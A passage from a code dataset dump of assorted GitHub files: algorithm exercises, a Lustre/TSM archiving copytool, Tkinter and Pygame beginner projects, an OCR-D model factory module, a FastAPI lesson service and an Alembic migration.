\n\n","repo_name":"lucabracaglia/TOMBOLA","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7291,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"32420744021","text":"from typing import List\n\nclass Solution:\n def singleNumber(self, nums: List[int]) -> int:\n \"\"\"Binary xor `^` operator, if x ^ y = z, then x ^ z = y.\n \"\"\"\n # suppose the singltons are a and b, x = a ^ b\n x = 0\n for y in nums:\n x ^= y\n # x & (-x) gives x's rightmost 1-bit position, \n # so this is the position a has 1 and b has 0 or vice versa\n z = x & (-x)\n # thus, z & a = 1 and z & b = 0 or vice versa\n a = 0\n for y in nums:\n if z & y:\n a ^= y\n return [a, x ^ a]\n\nif __name__ == '__main__':\n solver = Solution()\n # test cases\n cases = [\n [0,1],\n [2,2,3,5],\n [0,1,0,1,2,3]\n ]\n rslts = [solver.singleNumber(s) for s in cases]\n for cs, rs in zip(cases, rslts):\n print(f\"case: {cs} | solution: {rs}\") ","repo_name":"gyang274/leetcode","sub_path":"src/0200-0299/0260.single.num.py","file_name":"0260.single.num.py","file_ext":"py","file_size_in_byte":772,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"28641151533","text":"#!/usr/bin/python\nimport argparse\nimport logging\nimport xattr\nimport uuid\nimport tsm.client\nimport sys\nimport time\nimport os.path\nimport configparser\nimport pymysql\n\n\"\"\"\nUse the Python TSM library from bbrauns/tsm-api-client\nhttps://github.com/bbrauns/tsm-api-client\n\nEach file is assigned a UUID and this reference is used to put the object\nin the TSM backend.\n\"\"\"\n\nlogging.basicConfig(level=logging.DEBUG,\n filename='/var/log/ct_tsm.log')\n\n# Overwrite the default log level for TSM client. It is very verbose and\n# causes problems with systemd as this is all STDOUT\ntsmlogger = logging.getLogger('tsm.client')\ntsmlogger.propagate = False\ntsmlogger.setLevel(logging.DEBUG)\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--fd', type=int)\nparser.add_argument('--fid', required=True)\nparser.add_argument(\"--lustre-root\", required=True)\nparser.add_argument(\"--filespace\", default='project', type=str,\n help=\"TSM filespace where the archived file is stored, \\\nshould be similair to the Lustre filesystem name\")\nparser.add_argument(\"--config\", default='/etc/lhsm_cmd.conf', type=str,\n help=\"Config file, required to get the information in \\\nthe database of robinhood to remove with uuid\")\n\ngroup_action = parser.add_mutually_exclusive_group(required=True)\ngroup_action.add_argument('--archive', action='store_true',\n help=\"Send this file to TSM\")\ngroup_action.add_argument('--restore', action='store_true',\n help=\"Retrieve the content from TSM\")\ngroup_action.add_argument('--remove', action='store_true',\n help=\"Delete this file from TSM\")\n\nparser.add_argument('--verbose', '-v', action='count')\n\nargs = parser.parse_args()\n\ntsm_client = tsm.client.TSMApiClient()\n\n\ndef fid2lupath(lustre_root, fid):\n return \"{lustre_root}/.lustre/fid/{fid}\".format(\n lustre_root=args.lustre_root,\n fid=args.fid.strip('[]'),\n )\n\n\ndef logstatus(action, status, time, fid, size=0):\n logging.info(\n 'type=stats fid={0} action={1} status={2} runtime={3} size={4}'.format(\n fid, action, status, time, size))\n\n\nstart = time.time()\nif args.archive:\n action = 'ARCHIVE'\n if args.fd is None:\n logging.error('Need a FD handle to archive a file')\n sys.exit(1)\n if os.path.isfile(\"/proc/self/fd/{0}\".format(args.fd)) is False:\n logging.error('FD does not exist')\n sys.exit(1)\n\n fid_path = fid2lupath(args.lustre_root, args.fid)\n logging.info('Archiving fid %s, with fid_path %s', args.fid, fid_path)\n\n if 'trusted.lhsm.uuid' in xattr.listxattr(fid_path):\n # Get the previous UUID\n file_uuid = xattr.getxattr(fid_path, 'trusted.lhsm.uuid')\n else:\n # Create a new UUID for a new file\n new_uuid = str(uuid.uuid1()).encode()\n logging.debug('Assigning uuid %s', new_uuid)\n xattr.setxattr(fid_path, 'trusted.lhsm.uuid', new_uuid)\n file_uuid = new_uuid\n try:\n logging.debug('Starting Archival call: tsm_client.archive')\n tsm_client.archive(filename=\"/proc/self/fd/{fd}\".format(fd=args.fd),\n filespace=args.filespace,\n highlevel='by-uuid',\n lowlevel=file_uuid.decode())\n logging.info('Archive complete for {}'.format(args.fid))\n status = 'SUCCESS'\n except Exception as e:\n status = 'FAILURE'\n logging.error(e)\n finally:\n tsm_client.close()\n\nif args.restore:\n action = 'RESTORE'\n if args.fd is None:\n logging.error('Need a FD handle to restore a file')\n sys.exit(1)\n fid_path = fid2lupath(args.lustre_root, args.fid)\n logging.info('Started restore of fid %s, with fid_path %s',\n args.fid, fid_path)\n file_uuid = xattr.getxattr(fid_path, 'trusted.lhsm.uuid')\n logging.debug('UUID: %s', file_uuid.decode())\n\n try:\n tsm_client.connect()\n tsm_client.retrieve(dest_file=\"/proc/self/fd/{fd}\".format(fd=args.fd),\n filespace=args.filespace,\n highlevel='by-uuid',\n lowlevel=file_uuid.decode())\n logging.info('Retreival of fid {} from TSM completed'.format(args.fid))\n status = 'SUCCESS'\n except Exception as e:\n status = 'FAILURE'\n logging.error(e)\n finally:\n tsm_client.close()\n\nif args.remove:\n action = 'REMOVE'\n logging.info('Started removal of fid {} from TSM'.format(args.fid))\n fid_path = fid2lupath(args.lustre_root, args.fid)\n try:\n file_uuid = xattr.getxattr(fid_path, 'trusted.lhsm.uuid')\n except IOError:\n # File does not exist, we need to check in robinhood to get the UUID\n # in the SOFT_RM table\n config = configparser.ConfigParser()\n config.read(args.config)\n db = pymysql.connect(\n host=config.get('database', 'host'),\n port=int(config.get('database', 'port')),\n user=config.get('database', 'user'),\n password=config.get('database', 'password'),\n db=config.get('database', 'db'))\n cursor = db.cursor()\n query = \"SELECT lhsm_uuid FROM SOFT_RM_DELAYED \\\nWHERE id=\\\"{fid}\\\"\".format(\n fid=args.fid.strip(\"[]\"))\n cursor.execute(query)\n file_uuid = cursor.fetchone()[0]\n\n logging.debug('UUID: %s', file_uuid.decode())\n try:\n tsm_client.connect()\n tsm_client.delete(filespace=args.filespace,\n highlevel='by-uuid',\n lowlevel=file_uuid.decode())\n logging.info('Deletion of fid {} from TSM completed'.format(args.fid))\n status = 'SUCCESS'\n except Exception as e:\n logging.error(e)\n status = 'FAILURE'\n finally:\n tsm_client.close()\n\nruntime = round(time.time() - start)\nlogstatus(action, status, runtime, args.fid)\nif status != 'SUCCESS':\n sys.exit(1)\n","repo_name":"guilbaults/ct_tsm","sub_path":"ct_tsm.py","file_name":"ct_tsm.py","file_ext":"py","file_size_in_byte":5977,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"35109694923","text":"from tkinter import *\n\nroot = Tk()\n\nentry_1= Entry(root,width=45, bg='white', fg='black')\nentry_1.pack()\nentry_1.insert(0,'enter the name')\n\ndef Myclick():\n name= 'Hello '+entry_1.get()\n Label1= Label(root, text=name,font='Arial',fg='Blue')\n Label1.pack()\n\nMybutton= Button(root, text='Enter your name!!',padx=75, pady=5,bg='yellow',fg='red',command=Myclick) # state=DISABLED means disabling the button\nMybutton.pack()\n\n\nroot.mainloop()","repo_name":"subin1990/Python","sub_path":"Python_Basics/Tkinter_tutorial/4_Entry.py","file_name":"4_Entry.py","file_ext":"py","file_size_in_byte":446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"26512705180","text":"\n# FORMATAREA SIRURILOR DE CARACTERE:\n# se refera la construirea de siruri de caractere\n# este un mod mai nou si mai eficient de a concatena str\n# sintaxa: '{:*^30}'.format('centered) # use * as a fill char\n# dupa cele : poti sa specifici ce modificari vrei sa faci pe variabila resp\n\nfrom datetime import datetime\n\n\ntoy = \"car\"\n# %s -> aici vine un string\nnew_string = \"This is a %s\" % toy\n\nfirst_name = \"Mihai\"\nlast_name = \"Dinu\"\nage = 20\n\n\nprint(\"Prenume: %s | Nume: %s | Varsta: %d\" % (last_name, first_name, age))\n\n\ndef get_titles(lang):\n\n if lang == \"ro\":\n return {\n \"title\": \"factura\",\n \"client_name\": \"nume client\",\n \"client_address\": \"adresa\",\n \"iban\": \"IBAN\",\n }\n\n if lang == \"en\":\n return {\n \"title\": \"invoice\",\n \"client_name\": \"client name\",\n \"client_address\": \"address\",\n \"iban\": \"account number\",\n }\n\n\nclass Client:\n def __init__(self, name, address, iban) -> None:\n self.name = name\n self.address = address\n self.iban = iban\n\n\nclass Invoice:\n def __init__(self, client) -> None:\n self.client = client\n\n def print_invoice(self, lang):\n inv_len = 70\n strings = get_titles(lang)\n\n print(f\"{strings['title'].title():*^{inv_len}}\")\n print(\n f\"{strings['client_name'].title()}:\"\n f\"{self.client.name:>{inv_len - 1 - len(strings['client_name'])}}\"\n )\n print(\n f\"{strings['client_address'].title()}:\"\n f\"{self.client.address:>{inv_len - 1 - len(strings['client_address'])}}\"\n )\n print(\n f\"{strings['iban'].title()}:\"\n f\"{self.client.iban:>{inv_len - 1 - len(strings['iban'])}.20}\"\n )\n print(f\"{datetime.now().strftime('%d-%m-%Y'):=^{inv_len}}\")\n print()","repo_name":"simona0904/IT-School_2022","sub_path":"S17.string.operations/format1.py","file_name":"format1.py","file_ext":"py","file_size_in_byte":1866,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"72766666633","text":"# adjacency list\ngraph = {\n 'A': ['D', 'C', 'B'],\n 'B': ['E'],\n 'C': ['G', 'F'],\n 'D': ['H'],\n 'E': ['I'],\n 'F': ['J']\n}\n\n\ndef dfs(graph, node):\n \"\"\"\n This method will accept a graph, and traverse through it using DFS.\n We will use a stack and a list to keep track of the visited nodes.\n We will begin at the root node, append it to the path and mark it as visited.\n Then we will add all of its neighbors to the stack.\n At each step, we will pop out an element from the stack and check if it has been visited.\n If it has not been visited, we will add it to the path and add all of its neighbors to the stack. \n \"\"\"\n if node is None or node not in graph:\n return \"Invalid input\"\n\n path = []\n stack = [node]\n\n while len(stack) != 0:\n s = stack.pop()\n if s not in path:\n path.append(s)\n\n if s not in graph:\n # leaf node\n continue\n\n for neighbor in graph[s]:\n stack.append(neighbor)\n\n return \" \".join(path)\n\n\n# calling dfs method on node \"A\"\ndfsPath = dfs(graph, 'A')\n\nprint(dfsPath)\n\n# recursive dfs below\n\n\ndef recursiveDfs(graph, node, path=[]):\n \"\"\"\n This is the way to do dfs in a recursive manner.\n Base case will be \"if the leaf node has been visited, we need to backtrack\"\n \"\"\"\n if node not in path:\n path.append(node)\n\n if node not in graph:\n # back track, leaf node\n return path\n\n for neighbor in graph[node]:\n path = recursiveDfs(graph, neighbor, path)\n\n return path\n\n\ngraph2 = {\n 'A': ['B', 'C', 'D'],\n 'B': ['E'],\n 'C': ['F', 'G'],\n 'D': ['H'],\n 'E': ['I'],\n 'F': ['J']\n}\n\npath = recursiveDfs(graph2, 'A')\n\nprint(\" \".join(path))\n","repo_name":"calcantara35/AlgorithmsAndDataStructures","sub_path":"dfsNonRecursive.py","file_name":"dfsNonRecursive.py","file_ext":"py","file_size_in_byte":1784,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"9373571840","text":"class Node: \n def __init__(self, data, depth):\n self.data = data\n self.left = None\n self.right = None\n self.depth = depth\n#\n# Complete the swapNodes function below.\n#\n\ndef inOrder(root):\n #Write your code here\n if root == None: \n return\n inOrder(root.left)\n print(root.data, end=' ')\n inOrder(root.right)\n\ndef swap(root, h):\n if root == None:\n return\n if root.depth>=h and root.depth%h == 0:\n temp = root.left\n root.left = root.right\n root.right = temp\n swap(root.left, h)\n swap(root.right, h)\n \nfrom collections import deque\ndef swapNodes(indexes, queries):\n root = Node(1, 1)\n curr = root\n nodes = deque()\n nodes.append(curr)\n n = 0\n while(n < len(indexes)):\n curr = nodes[0]\n nodes.popleft()\n leftnode = indexes[n][0]\n rightnode = indexes[n][1]\n curr.left = None if leftnode == -1 else Node(leftnode, curr.depth+1)\n curr.right = None if rightnode == -1 else Node(rightnode, curr.depth+1)\n if curr.left !=None and curr.left.data != -1: \n nodes.append(curr.left)\n if curr.right != None and curr.right.data != -1: \n nodes.append(curr.right)\n n=n+1\n \n for height in queries:\n swap(root, height)\n inOrder(root)\n print()\n \nif __name__ == '__main__':\n\n n = int(input())\n\n indexes = []\n\n for _ in range(n):\n indexes.append(list(map(int, input().rstrip().split())))\n\n queries_count = int(input())\n\n queries = []\n\n for _ in range(queries_count):\n queries_item = int(input())\n queries.append(queries_item)\n\n swapNodes(indexes, queries)\n","repo_name":"princesharma74/60DaysChallenge","sub_path":"DAY43.py","file_name":"DAY43.py","file_ext":"py","file_size_in_byte":1702,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"37822960732","text":"import re\nimport nltk\nnltk.download('punkt')\n\nwith open('stopwords-ms.txt', 'r') as f:\n stop_words = [line.strip() for line in f]\n\ndef preprocess_text(text):\n # Remove URLs\n text = re.sub(r'http\\S+', '', text)\n # Remove hashtags\n text = re.sub(r'#[A-Za-z0-9]+', '', text)\n # Remove mentions\n text = re.sub(r'@[A-Za-z0-9]+', '', text)\n # Remove emojis\n text = re.sub(r'[^\\w\\s]', '', text)\n # Tokenize text\n tokens = nltk.word_tokenize(text.lower())\n # Remove stopwords\n tokens = [token for token in tokens if token not in stop_words]\n # Join tokens back into string\n text = ' '.join(tokens)\n return text\n","repo_name":"ssakinah/pantau","sub_path":"fastapi/text_preprocessor.py","file_name":"text_preprocessor.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"24384888377","text":"\"\"\"\n\nFactory methods to create models for data, files, URLs.\n\n\"\"\"\nfrom datetime import datetime\nfrom pathlib import Path\nfrom yaml import safe_load, safe_dump\n\nfrom PIL import Image\nfrom lxml import etree as ET\n\nfrom ocrd_utils import VERSION, MIMETYPE_PAGE, guess_media_type\nfrom ocrd_models import OcrdExif, OcrdFile, ClientSideOcrdFile\nfrom ocrd_models.ocrd_page import (\n PcGtsType, PageType, MetadataType,\n parse, parseEtree\n)\n\n__all__ = [\n 'exif_from_filename',\n 'page_from_file',\n 'page_from_image',\n]\n\n\ndef exif_from_filename(image_filename):\n \"\"\"\n Create :py:class:`~ocrd_models.ocrd_exif.OcrdExif`\n by opening an image file with PIL and reading its metadata.\n\n Arguments:\n image_filename (str): Local image path name (relative to workspace).\n \"\"\"\n if image_filename is None:\n raise Exception(\"Must pass 'image_filename' to 'exif_from_filename'\")\n with Image.open(image_filename) as pil_img:\n ocrd_exif = OcrdExif(pil_img)\n return ocrd_exif\n\ndef page_from_image(input_file, with_tree=False):\n \"\"\"\n Create :py:class:`~ocrd_models.ocrd_page.OcrdPage`\n from an :py:class:`~ocrd_models.ocrd_file.OcrdFile`\n representing an image (i.e. should have ``@mimetype`` starting with ``image/``).\n\n Arguments:\n input_file (:py:class:`~ocrd_models.ocrd_file.OcrdFile`): file to open \\\n and produce a PAGE DOM for\n Keyword arguments:\n with_tree (boolean): whether to return XML node tree, element-node mapping \\\n and reverse mapping, too (cf. :py:func:`ocrd_models.ocrd_page.parseEtree`)\n \"\"\"\n if not input_file.local_filename:\n raise ValueError(\"input_file must have 'local_filename' property\")\n if not Path(input_file.local_filename).exists():\n raise FileNotFoundError(\"File not found: '%s' (%s)\" % (input_file.local_filename, input_file))\n exif = exif_from_filename(input_file.local_filename)\n now = datetime.now()\n pcgts = PcGtsType(\n Metadata=MetadataType(\n Creator=\"OCR-D/core %s\" % VERSION,\n Created=now,\n LastChange=now\n ),\n Page=PageType(\n imageWidth=exif.width,\n imageHeight=exif.height,\n # XXX brittle\n imageFilename=str(input_file.local_filename) if input_file.local_filename else input_file.url\n ),\n pcGtsId=input_file.ID\n )\n if not with_tree:\n return pcgts\n mapping = dict()\n etree = pcgts.to_etree(mapping_=mapping)\n revmap = dict(((node, element) for element, node in mapping.items()))\n return pcgts, etree, mapping, revmap\n\ndef page_from_file(input_file, with_tree=False):\n \"\"\"\n Create :py:class:`~ocrd_models.ocrd_page.OcrdPage`\n from an :py:class:`~ocrd_models.ocrd_file.OcrdFile` or a file path\n representing either a PAGE-XML or an image (to generate a PAGE-XML for).\n\n Arguments:\n input_file (:py:class:`~ocrd_models.ocrd_file.OcrdFile` or `str`): file to open \\\n and produce a PAGE DOM for\n Keyword arguments:\n with_tree (boolean): whether to return XML node tree, element-node mapping \\\n and reverse mapping, too (cf. :py:func:`ocrd_models.ocrd_page.parseEtree`)\n \"\"\"\n if not isinstance(input_file, (OcrdFile, ClientSideOcrdFile)):\n mimetype = guess_media_type(input_file, application_xml=MIMETYPE_PAGE)\n input_file = OcrdFile(ET.Element(\"dummy\"),\n local_filename=input_file,\n mimetype=mimetype)\n if not input_file.local_filename:\n raise ValueError(\"input_file must have 'local_filename' property\")\n if not Path(input_file.local_filename).exists():\n raise FileNotFoundError(\"File not found: '%s' (%s)\" % (input_file.local_filename, input_file))\n if input_file.mimetype.startswith('image'):\n return page_from_image(input_file, with_tree=with_tree)\n if input_file.mimetype == MIMETYPE_PAGE:\n return (parseEtree if with_tree else parse)(input_file.local_filename, silence=True)\n raise ValueError(\"Unsupported mimetype '%s'\" % input_file.mimetype)\n","repo_name":"OCR-D/core","sub_path":"ocrd_modelfactory/ocrd_modelfactory/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4120,"program_lang":"python","lang":"en","doc_type":"code","stars":117,"dataset":"github-code","pt":"27"} +{"seq_id":"28105698969","text":"t = int(input())\nfor _ in range(t):\n n = int(input())\n arr = [0]\n ind = [0]*n\n comm = []\n for i in range(n-1):\n if arr[i] not in comm:\n arr.append(0)\n comm.append(arr[i])\n ind[arr[i]] = i\n else:\n arr.append(abs(ind[arr[i]] - i))\n ind[arr[i]] = i\n print(arr.count(arr[n-1]))\n","repo_name":"22Rahul22/Codechef","sub_path":"Hard Sequence.py","file_name":"Hard Sequence.py","file_ext":"py","file_size_in_byte":361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"74004587591","text":"import pygame\nimport random\nimport sys\nfrom pygame.locals import *\n\n\nFPS = 32\nSCREEENWIDTH = 400\nSCREEENHEIGHT = 512\nscreen = pygame.display.set_mode((SCREEENWIDTH,SCREEENHEIGHT))\nGROUNDY = SCREEENHEIGHT * 0.8\nGAME_SPRITES = {}\nGAME_SOUNDS = {}\nBG = 'bg.jpeg'\npipe = 'pipe1.jpeg'\n\n#Image Processing\nPLAYER = pygame.image.load('bird.png')\nPLAYER = pygame.transform.scale(PLAYER,(70,70))\nBASE = pygame.image.load('base.png')\nBASE = pygame.transform.scale(BASE,(500,250))\n#Score Image Processing\nZERO = pygame.image.load('0.png')\nZERO = pygame.transform.scale(ZERO,(40,60))\nONE = pygame.image.load('1.png')\nONE = pygame.transform.scale(ONE,(40,60))\nTWO = pygame.image.load('2.png')\nTWO = pygame.transform.scale(TWO,(40,60))\nTHREE = pygame.image.load('3.png')\nTHREE = pygame.transform.scale(THREE,(40,60))\nFOUR = pygame.image.load('4.png')\nFOUR = pygame.transform.scale(FOUR,(40,60))\nFIVE = pygame.image.load('5.png')\nFIVE = pygame.transform.scale(FIVE,(40,60))\nSIX = pygame.image.load('6.png')\nSIX = pygame.transform.scale(SIX,(40,60))\nSEVEN = pygame.image.load('7.png')\nSEVEN = pygame.transform.scale(SEVEN,(40,60))\nEIGHT = pygame.image.load('8.png')\nEIGHT = pygame.transform.scale(EIGHT,(40,60))\nNINE = pygame.image.load('9.png')\nNINE = pygame.transform.scale(NINE,(40,60))\n\ndef message(size, mess, x_pos, y_pos, color):\n font = pygame.font.SysFont(None, size)\n render = font.render(mess , True, color)\n screen.blit(render, (x_pos, y_pos))\n\n\ndef WelcomeScreen():\n while True:\n for event in pygame.event.get():\n if event.type == pygame.QUIT or (event.type == KEYDOWN and event.key == K_ESCAPE):\n pygame.quit()\n sys.exit()\n\n elif event.type == KEYDOWN and (event.key == K_SPACE or event.key == K_UP):\n return\n\n else:\n message(50,\"Welcome to Flappy Bird\",10,30,(0,0,0))\n screen.blit(GAME_SPRITES['background'],(0,0))\n screen.blit(GAME_SPRITES['player'],(150,200))\n screen.blit(GAME_SPRITES['base'],(-30,365))\n pygame.display.update()\n\nif __name__ == '__main__':\n pygame.init()\n FPSCLOCK = pygame.time.Clock()\n pygame.display.set_caption('Flappy Bird')\n #Sprites\n GAME_SPRITES['pipe'] = (\n pygame.transform.rotate( pygame.image.load(pipe).convert_alpha(),180),\n pygame.image.load(pipe).convert_alpha() )\n\n GAME_SPRITES['background'] = pygame.image.load(BG).convert()\n GAME_SPRITES['player'] = PLAYER.convert_alpha()\n GAME_SPRITES['base'] = BASE.convert_alpha()\n\n #Sounds\n # GAME_SOUNDS[''] = pygame.mixer.Sound()\n\n while True:\n WelcomeScreen()\n maingame()\n\n","repo_name":"ItzMeAman14/Project_Flappy_Bird","sub_path":"Main/main_2.py","file_name":"main_2.py","file_ext":"py","file_size_in_byte":2703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"17944353084","text":"'''\n\nLet's play with the different ways to use variable arguments in\nPython. Define the functions below to make everything pass.\n\n>>> point = (3, 8, 2)\n>>> coordinates = {'x': 8, 'y': 33, 'z': -4}\n\n>>> set_destination(*point)\nGoing to x=3, y=8, z=2\n\n>>> set_destination(**coordinates)\nGoing to x=8, y=33, z=-4\n\n\n>>> values = {\"a\":3, \"b\":2, \"c\":4}\n>>> some_values = {\"c\": 7, \"b\": 4}\n\n>>> product(2, 7, 3)\n42\n>>> product(**values)\n24\n>>> product(1, **some_values)\n28\n\n>>> amounts = {\"u\": 3, \"v\": 2, \"w\": 4}\n>>> some_amounts = {\"v\": 7, \"w\": 4}\n>>> total(1, 2, 3)\n6\n>>> total(**amounts)\n9\n>>> total(3, **some_amounts)\n14\n\n>>> max_even(2, 3)\n2\n>>> max_even(2, 4)\n4\n>>> max_even(2, 3, 9, 11, 7, 8, 13, 21)\n8\n\n\n>>> country_populations = {\n... \"Russia\": 144,\n... \"USA\": 319,\n... \"Philippines\": 99,\n... \"India\": 1252,\n... }\n\n>>> val_for_longest_key(a=1)\n1\n>>> val_for_longest_key(a=2, aa=3)\n3\n>>> val_for_longest_key(foo=10, alpha=3, x=9)\n3\n>>> val_for_longest_key(**country_populations)\n99\n\n>>> key_for_biggest_value(a=1)\n'a'\n>>> key_for_biggest_value(a=2, aa=3)\n'aa'\n>>> key_for_biggest_value(foo=10, alpha=3, x=9)\n'foo'\n>>> key_for_biggest_value(**country_populations)\n'India'\n\n'''\n\n# Write your code here:\n\n\n#set_destination\ndef set_destination(*args, **kwargs):\n if kwargs:\n print( \"Going to x={}, y={}, z={}\".format(kwargs[\"x\"], kwargs[\"y\"], kwargs[\"z\"]))\n return\n if args:\n print(\"Going to x={}, y={}, z={}\".format(args[0], args[1], args[2]))\n return\n#total\ndef total(x=0,y=0,z=0,**kwargs):\n keys = kwargs.keys()\n result = x + y + z\n for key in keys:\n result += kwargs[key]\n return result\n\n#product\ndef product(x=1,y=1,z=1,**kwargs):\n keys = kwargs.keys()\n result = x * y * z\n for key in keys:\n result *= kwargs[key]\n return result\n\n#max_even\ndef max_even(*args):\n maxeven = 0\n for arg in args:\n if arg % 2 == 0:\n if arg >maxeven:\n maxeven = arg\n return maxeven\n\n#val_for_longest_key\ndef val_for_longest_key(**kwargs):\n keys = kwargs.keys()\n longestKey = \"\"\n for key in keys:\n if len(key) > len(longestKey):\n longestKey = key\n return kwargs[longestKey]\n\n#key_for_biggest_value\ndef key_for_biggest_value(**kwargs):\n keys = kwargs.keys()\n biggestValue = 0\n biggestValueKey = \"\"\n for key in keys:\n if kwargs[key] > biggestValue:\n biggestValue = kwargs[key]\n biggestValueKey = key\n return biggestValueKey\n\n# Do not edit any code below this line!\n\nif __name__ == '__main__':\n import doctest\n doctest.testmod()\n\n# Copyright 2015-2016 Aaron Maxwell. All rights reserved.\n","repo_name":"AnchalChandraGupta/labAssignmentSolution","sub_path":"labs/py2/functions/varargs.py","file_name":"varargs.py","file_ext":"py","file_size_in_byte":2673,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"26123284556","text":"from operator import and_\nfrom models.lesson import Lesson as LessonModel\nfrom schemas.lesson import Lesson\n\nclass LessonService():\n def __init__(self,db)-> None:\n self.db = db\n\n def get_lesson(self):\n result = self.db.query(LessonModel).all()\n return result\n \n def get_lesson_by_id(self,id:int):\n result = self.db.query(LessonModel).filter(LessonModel.id == id ).first()\n return result\n \n def get_lesson_by_name(self,name:str):\n result = self.db.query(LessonModel).filter(LessonModel.name == name).first()\n return result\n \n def create_lesson(self,lesson:Lesson):\n new_lesson = LessonModel(\n id= lesson.id,\n name = lesson.name,\n description = lesson.description,\n video = lesson.video,\n resources =lesson.resources\n )\n self.db.add(new_lesson)\n self.db.commit()\n return\n \n def update_lesson(self,id:int, data:Lesson):\n lesson = self.db.query(LessonModel).filter(LessonModel.id == id).first()\n lesson.name = data.name\n lesson.description = data.description\n lesson.video = data.video\n lesson.resources =data.resources\n self.db.commit()\n return\n\n def update_lesson_by_name(self,name:str, data:Lesson):\n lesson = self.db.query(LessonModel).filter(LessonModel.name == name).first()\n lesson.name = data.name\n lesson.description = data.description\n lesson.video = data.video\n lesson.resources =data.resources\n self.db.commit()\n return\n\n def update_status_lesson(self, id:int):\n lesson = self.db.query(LessonModel).filter(LessonModel.id == id).first()\n lesson.status = False\n self.db.commit()\n return\n\n def delete_lesson(self, id:int):\n self.db.query(LessonModel).filter(LessonModel.id == id).delete()\n self.db.commit()\n return\n","repo_name":"programateacademy/cuyeca-course-manege-backend","sub_path":"services/lesson.py","file_name":"lesson.py","file_ext":"py","file_size_in_byte":1961,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"14673458448","text":"\nclass file:\n def __init__(self, name, size):\n self.name = name\n self.size = size\n def __repr__(self):\n print(self.size, self.name)\n\nclass dir:\n def __init__(self, name, parent=None):\n self.name = name\n self.parent = parent\n self.dirs = dict()\n self.files = list()\n self._size = None\n def size(self):\n if self._size is None: # memoize\n self._size = sum(file.size for file in self.files) + sum(\n self.dirs[dir].size() for dir in self.dirs\n )\n return self._size\n def make_dir(self, subdir):\n if subdir not in self.dirs:\n self.dirs[subdir] = dir(subdir, self)\n return self.dirs[subdir]\n def add_file(self, filename, size):\n self.files.append(file(filename, size))\n def path(self):\n parts = list()\n current = self\n while current is not None:\n parts.append(current.name)\n current = current.parent\n return \"/\".join(reversed(parts))\n def root(self):\n current = self\n while current.parent is not None:\n current = current.parent\n return current\n def dfs(self, v):\n for dir in self.dirs.values():\n result = dir.dfs(v)\n if result is not None:\n return result\n return self if v(self) else None\n\ndef main(stream, opts):\n cwd = root = dir(\"\")\n line = stream.readline()\n while line:\n if line[0] != \"$\": # command\n raise RuntimeError(f\"expected command, not {line[:-1]!r}\")\n cmd = line[2:4]\n if opts.verbose:\n print(\"$\", cmd)\n if cmd == \"cd\": # change dir\n path = line[5:-1] # strip newline\n if path == \"..\":\n cwd = cwd.parent\n elif path == \"/\":\n cwd = root\n else:\n cwd = cwd.make_dir(path)\n line = stream.readline()\n elif cmd == \"ls\": # list\n line = stream.readline()\n while line:\n if line.startswith(\"dir \"):\n cwd.make_dir(path)\n elif line[0] == \"$\":\n break\n else:\n size, name = line.split(None, 1)\n cwd.add_file(name.rstrip(), int(size))\n line = stream.readline()\n else:\n raise RuntimeError(f\"unsupported command {cmd!r}\")\n\n p1sum = [0]\n def visit(d):\n if d.size() <= 100000:\n p1sum[0] += d.size()\n root.dfs(visit)\n print(\"part 1:\", p1sum[0])\n\n total_space = 70000000\n free_target = 30000000\n free_current = (total_space - root.size())\n need_freed = free_target - free_current\n print(f\"need to free {need_freed}\")\n best_removal = [root]\n def visit(d):\n if d.size() >= need_freed and d.size() < best_removal[0].size():\n if opts.verbose:\n print(f\"{d.name}, size={d.size()} >= need_freed {need_freed}?\")\n best_removal[0] = d\n root.dfs(visit)\n best_removal = best_removal[0]\n print(\"part 2:\", best_removal.name, best_removal.size())\n","repo_name":"fritzr/advent2022","sub_path":"src/advent2022/day07/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3160,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"40704800854","text":"\"\"\"init\n\nRevision ID: e46dc3f1cd7b\nRevises:\nCreate Date: 2023-04-25 12:39:18.269715\n\n\"\"\"\nimport sqlalchemy as sa\nimport sqlmodel\nfrom alembic import op\n\n# revision identifiers, used by Alembic.\nrevision = \"e46dc3f1cd7b\"\ndown_revision = None\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade() -> None:\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table(\n \"metricsunit\",\n sa.Column(\"id\", sa.Integer(), nullable=True),\n sa.Column(\"service_name\", sqlmodel.sql.sqltypes.AutoString(), nullable=False),\n sa.Column(\"path\", sqlmodel.sql.sqltypes.AutoString(), nullable=False),\n sa.Column(\"response_time_ms\", sa.Integer(), nullable=False),\n sa.PrimaryKeyConstraint(\"id\"),\n )\n op.create_index(op.f(\"ix_metricsunit_path\"), \"metricsunit\", [\"path\"], unique=False)\n op.create_index(op.f(\"ix_metricsunit_service_name\"), \"metricsunit\", [\"service_name\"], unique=False)\n # ### end Alembic commands ###\n\n\ndef downgrade() -> None:\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_index(op.f(\"ix_metricsunit_service_name\"), table_name=\"metricsunit\")\n 